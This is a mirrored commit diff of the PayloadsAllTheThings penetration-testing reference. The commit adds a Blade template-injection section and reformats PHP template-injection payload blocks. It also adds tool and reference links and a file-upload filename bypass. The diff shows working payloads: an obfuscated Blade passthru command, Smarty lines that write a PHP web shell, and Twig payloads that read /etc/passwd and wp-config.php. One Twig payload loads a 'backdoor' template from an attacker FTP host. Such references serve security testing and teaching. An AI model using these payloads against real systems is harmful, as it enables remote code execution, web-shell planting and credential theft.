Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 08:54:40 +01:00
Code Issues Projects Releases Wiki Activity

Syntax Highlighting SSTI

Browse source
This commit is contained in:
Swissky 2025-11-15 17:11:42 +01:00
parent 5c0ee4c6d9
commit 832b54fd95
4 changed files with 30 additions and 13 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
GraphQL Injection/README.md
View file

@ -38,6 +38,7 @@
- [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility - [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
- [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations - [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
- [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs - [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility
- [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph - [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
- [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client - [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client

28
Server Side Template Injection/PHP.md
View file

@ -22,20 +22,33 @@
## Templating Libraries ## Templating Libraries
| Template Name | Payload Format | | Template Name | Payload Format |
| -------------- | --------- | | --------------- | --------- |
| Laravel Blade | `{{ }}` | | Blade (Laravel) | `{{ }}` |
| Latte | `{var $X=""}{$X}` | | Latte | `{var $X=""}{$X}` |
| Mustache | `{{ }}` | | Mustache | `{{ }}` |
| Plates | `<?= ?>` | | Plates | `<?= ?>` |
| Smarty | `{ }` | | Smarty | `{ }` |
| Twig | `{{ }}` | | Twig | `{{ }}` |
## Blade
[Official website](https://laravel.com/docs/master/blade)
> Blade is the simple, yet powerful templating engine that is included with Laravel.
The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`.
```php
{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
```
---
## Smarty ## Smarty
[Official website](https://www.smarty.net/docs/en/) [Official website](https://www.smarty.net/docs/en/)
> Smarty is a template engine for PHP. > Smarty is a template engine for PHP.
```python ```php
{$smarty.version} {$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3 {php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
@ -52,7 +65,7 @@
### Twig - Basic Injection ### Twig - Basic Injection
```python ```php
{{7*7}} {{7*7}}
{{7*'7'}} would result in 49 {{7*'7'}} would result in 49
{{dump(app)}} {{dump(app)}}
@ -62,7 +75,7 @@
### Twig - Template Format ### Twig - Template Format
```python ```php
$output = $twig > render ( $output = $twig > render (
'Dear' . $_GET['custom_greeting'], 'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name) array("first_name" => $user.first_name)
@ -76,14 +89,14 @@ $output = $twig > render (
### Twig - Arbitrary File Reading ### Twig - Arbitrary File Reading
```python ```php
"{{'/etc/passwd'|file_excerpt(1,30)}}"@ "{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}} {{include("wp-config.php")}}
``` ```
### Twig - Code Execution ### Twig - Code Execution
```python ```php
{{self}} {{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
@ -249,4 +262,5 @@ layout template:
## References ## References
- [Limitations are just an illusion advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)

1
Server Side Template Injection/Python.md
View file

@ -406,3 +406,4 @@ PoC :
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)

1
Upload Insecure Files/README.md
View file

@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities.
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.` * Multiple special characters: `file.jsp/././././.`
* UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt`
* On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php". * On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php".
* On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php". * On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".